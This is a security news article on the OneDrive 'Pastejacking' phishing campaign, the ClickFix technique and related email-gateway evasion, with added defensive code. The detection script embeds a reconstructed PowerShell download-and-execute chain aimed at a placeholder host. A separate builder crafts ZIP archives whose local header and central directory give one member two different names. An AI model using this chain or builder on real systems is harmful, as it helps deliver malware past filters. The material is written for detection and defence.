OneDrive Phishing Scam Tricks Users into Running Malicious PowerShell Script
Cybersecurity researchers are warning about a new phishing campaign that targets Microsoft OneDrive users with the aim of executing a malicious PowerShell script.
“This campaign heavily relies on social engineering tactics to deceive users into executing a PowerShell script, thereby compromising their systems,” Trellix security researcher Rafael Pena said in a Monday analysis.
The cybersecurity company is tracking the “crafty” phishing and downloader campaign under the name OneDrive Pastejacking.
The attack unfolds via an email containing an HTML file that, when opened, renders an image simulating a OneDrive page together with an error message that reads: “Failed to connect to the ‘OneDrive’ cloud service. To fix the error, you need to update the DNS cache manually.”
The message also comes with two options, namely “How to fix” and “Details,” with the latter directing the email recipient to a legitimate Microsoft Learn page on Troubleshooting DNS.
However, clicking “How to fix” presents the user with a series of steps: press “Windows Key + X” to open the Quick Link menu, launch the PowerShell terminal, and paste a Base64-encoded command that supposedly fixes the issue.
“The command […] first runs ipconfig /flushdns, then creates a folder on the C: drive named ‘downloads,’” Pena explained. “Subsequently, it downloads an archive file into this location, renames it, extracts its contents (‘script.a3x’ and ‘AutoIt3.exe’), and executes script.a3x using AutoIt3.exe.”
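As an added example, not code from the Trellix report, the detection side of the chain described above: a triage routine that finds the Base64 argument powershell.exe accepts for -EncodedCommand, decodes it as UTF-16LE (the encoding PowerShell expects), and matches the decoded script against the indicators the article lists (ipconfig /flushdns, a C:\downloads staging folder, a download, an archive extraction, AutoIt3.exe running a .a3x script). The sample process-creation records are constructed with Sysmon Event ID 1 field names, and the encoded command is reconstructed from the steps in the article with a placeholder URL; the actual command line used in the campaign is not reproduced here.

```python
import base64
import re
from typing import Optional


# PowerShell's -EncodedCommand takes Base64 of the UTF-16LE script text.
def encode_powershell(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Reconstructed from the steps the article lists; the URL is a placeholder and
# this is NOT the command line observed in the campaign.
RECONSTRUCTED_CHAIN = (
    "ipconfig /flushdns; "
    "New-Item -ItemType Directory -Path C:\\downloads -Force; "
    "Invoke-WebRequest https://example.invalid/pkg.bin -OutFile C:\\downloads\\pkg.bin; "
    "Rename-Item C:\\downloads\\pkg.bin pkg.zip; "
    "Expand-Archive C:\\downloads\\pkg.zip -DestinationPath C:\\downloads; "
    "& C:\\downloads\\AutoIt3.exe C:\\downloads\\script.a3x"
)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation records using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -e " + encode_powershell(RECONSTRUCTED_CHAIN)},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -e " + encode_powershell("Get-Date")},
]

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Indicators drawn from the chain the article describes.
INDICATORS = {
    "flushdns_pretext": re.compile(r"ipconfig\s+/flushdns", re.I),
    "staging_dir": re.compile(r"c:\\downloads\b", re.I),
    "download": re.compile(r"invoke-webrequest|\biwr\b|downloadfile|start-bitstransfer|\bcurl\b", re.I),
    "archive_extract": re.compile(r"expand-archive|\[io\.compression\.zipfile\]", re.I),
    "autoit_loader": re.compile(r"autoit3\.exe|\.a3x\b", re.I),
}

# Parents a user-launched shell has: explorer.exe (Win+X on Windows 10, Run box)
# or WindowsTerminal.exe where Win+X opens Windows Terminal.
INTERACTIVE_PARENTS = ("\\explorer.exe", "\\windowsterminal.exe")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event: dict) -> dict:
    """Decode the command, match indicators, and decide whether it fits the chain."""
    decoded = decode_encoded_command(event["CommandLine"])
    script = decoded if decoded is not None else event["CommandLine"]
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    interactive = event["ParentImage"].lower().endswith(INTERACTIVE_PARENTS)
    # A user-launched shell carrying an encoded command that stages and runs a
    # downloaded payload is the pastejacking shape; encoding alone is not enough.
    suspicious = decoded is not None and interactive and len(hits) >= 3
    return {"decoded": decoded, "indicators": hits, "suspicious": suspicious}


def triage(events: list) -> list:
    return [e for e in events if analyse_event(e)["suspicious"]]


if __name__ == "__main__":
    for e in triage(SAMPLE_EVENTS):
        print("SUSPICIOUS:", e["ParentImage"], "->", analyse_event(e)["indicators"])
```

The verdict is driven by the combination, not by the encoding: management agents and scheduled tasks run encoded commands all day, and an interactive parent with a one-liner like Get-Date is a user experimenting. Where PowerShell Script Block Logging (Event ID 4104) is enabled, the decoded script is recorded directly and the same indicator matching applies without the decoding step.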
The campaign has been observed targeting users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K.
The disclosure builds upon similar findings from ReliaQuest, Proofpoint, and McAfee Labs, indicating that phishing attacks employing this technique – also tracked as ClickFix – are becoming increasingly prevalent.
The development comes amid the discovery of a new email-based social engineering campaign distributing bogus Windows shortcut files that lead to the execution of malicious payloads hosted on Discord’s Content Delivery Network (CDN) infrastructure.
Other phishing campaigns have been observed sending Microsoft Office Forms from previously compromised legitimate email accounts to entice targets into divulging their Microsoft 365 login credentials by clicking on a seemingly innocuous link.
“Attackers create legitimate-looking forms on Microsoft Office Forms, embedding malicious links within the forms,” Perception Point said. “These forms are then sent to targets en masse via email under the guise of legitimate requests such as changing passwords or accessing important documents, mimicking trusted platforms and brands like Adobe or Microsoft SharePoint document viewer.”
What’s more, other attack waves have used invoice-themed lures to trick victims into entering their credentials on phishing pages hosted on Cloudflare R2, from where they are exfiltrated to the threat actor via a Telegram bot.
It’s no surprise that adversaries are constantly on the lookout for different ways to stealthily smuggle malware past Secure Email Gateways (SEGs) so as to increase the likelihood of success of their attacks.
According to a recent report from Cofense, bad actors are abusing how SEGs scan ZIP archive attachments to deliver the Formbook information stealer by means of DBatLoader (aka ModiLoader and NatsoLoader).
Specifically, the HTML payload is passed off as an MPEG file, exploiting the fact that many common archive extractors and SEGs trust the file header information and ignore the footer, which may describe the file format more accurately. (In the ZIP format, each member has a local header near the front of the archive, while the authoritative listing of members, the central directory, sits at the end.)
“The threat actors utilized a .ZIP archive attachment and when the SEG scanned the file contents, the archive was detected as containing a .MPEG video file and was not blocked or filtered,” the company noted.
“When this attachment was opened with common/popular archive extraction tools such as 7-Zip or Power ISO, it also appeared to contain a .MPEG video file, but it would not play. However, when the archive was opened in an Outlook client or via the Windows Explorer archive manager, the .MPEG file is (correctly) detected as being a .HTML [file].”
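As an added example, not code from the Cofense report, the following builds a ZIP archive that tells two different stories depending on which part of the file a consumer reads, and a checker that reads both. The article does not spell out which fields disagreed in the observed attachments; the archive constructed here names the same member differently in its local file header (what a front-to-back parser sees) and in the central directory (the listing at the end of the file, which Python's zipfile and, per the quote above, Outlook and Explorer rely on). That is one concrete way to produce the symptom described, not a claim about the exact bytes the threat actors used. The HTML payload is a constructed placeholder.

```python
import io
import struct
import zipfile
import zlib

# ZIP layout: every member has a local file header near the front of the file;
# the central directory, which the format treats as authoritative, sits at the
# end, just before the end-of-central-directory (EOCD) record.
LOCAL_SIG, CENTRAL_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
LOCAL_FMT = "<4sHHHHHIIIHH"          # 30 bytes before the name/extra fields
CENTRAL_FMT = "<4sHHHHHHIIIHHHHHII"  # 46 bytes before name/extra/comment
EOCD_FMT = "<4sHHHHIIH"              # 22 bytes, empty archive comment

# Constructed placeholder payload; a real lure would be a credential-phishing page.
SAMPLE_HTML = b"<html><body>constructed sample, not the campaign's lure</body></html>"


def build_mismatched_zip(local_name: bytes, central_name: bytes, data: bytes) -> bytes:
    """Build a one-member, stored (uncompressed) archive whose local header
    carries one filename and whose central directory carries another.
    Timestamps are left at zero; they play no part in the name check."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    local = struct.pack(LOCAL_FMT, LOCAL_SIG, 20, 0, 0, 0, 0, crc,
                        len(data), len(data), len(local_name), 0) + local_name
    body = local + data
    central = struct.pack(CENTRAL_FMT, CENTRAL_SIG, 20, 20, 0, 0, 0, 0, crc,
                          len(data), len(data), len(central_name),
                          0, 0, 0, 0, 0,   # extra, comment, disk, int/ext attrs
                          0) + central_name  # offset of the local header
    eocd = struct.pack(EOCD_FMT, EOCD_SIG, 0, 0, 1, 1, len(central), len(body), 0)
    return body + central + eocd


def local_header_names(blob: bytes) -> dict:
    """Walk the local headers from the front, as a tool that trusts the
    'header information' does, returning {header_offset: filename}."""
    names, off = {}, 0
    while blob[off:off + 4] == LOCAL_SIG:
        (_, _, flags, _, _, _, _, csize, _, nlen, xlen) = struct.unpack_from(LOCAL_FMT, blob, off)
        if flags & 0x08:
            # Bit 3: sizes live in a trailing data descriptor. The sample never
            # sets it; a production scanner has to handle that case.
            raise ValueError("data descriptor entries not handled by this walker")
        names[off] = blob[off + 30:off + 30 + nlen].decode("cp437")
        off += 30 + nlen + xlen + csize
    return names


def central_directory_names(blob: bytes) -> list:
    """What the central directory says the members are; zipfile reads only
    this listing when it enumerates an archive."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.namelist()


def find_name_mismatches(blob: bytes) -> list:
    """Pair each central-directory entry with the local header it points at and
    report (central_name, local_name) where they disagree. A gateway should
    treat any mismatch as grounds to block, whichever name looks harmless."""
    local = local_header_names(blob)
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return [(zi.filename, local.get(zi.header_offset))
                for zi in zf.infolist() if local.get(zi.header_offset) != zi.filename]


if __name__ == "__main__":
    blob = build_mismatched_zip(b"video.mpeg", b"payload.html", SAMPLE_HTML)
    print("local headers:    ", local_header_names(blob))
    print("central directory:", central_directory_names(blob))
    print("mismatches:       ", find_name_mismatches(blob))
```

The two views disagree on purpose: a scanner that only walks local headers sees video.mpeg, while one that reads the central directory sees payload.html. Python's zipfile happens to compare the two when a member is actually opened and raises BadZipFile if the names differ, which is the right posture for an SEG as well: the question is not which name is the true one but why an archive would carry two.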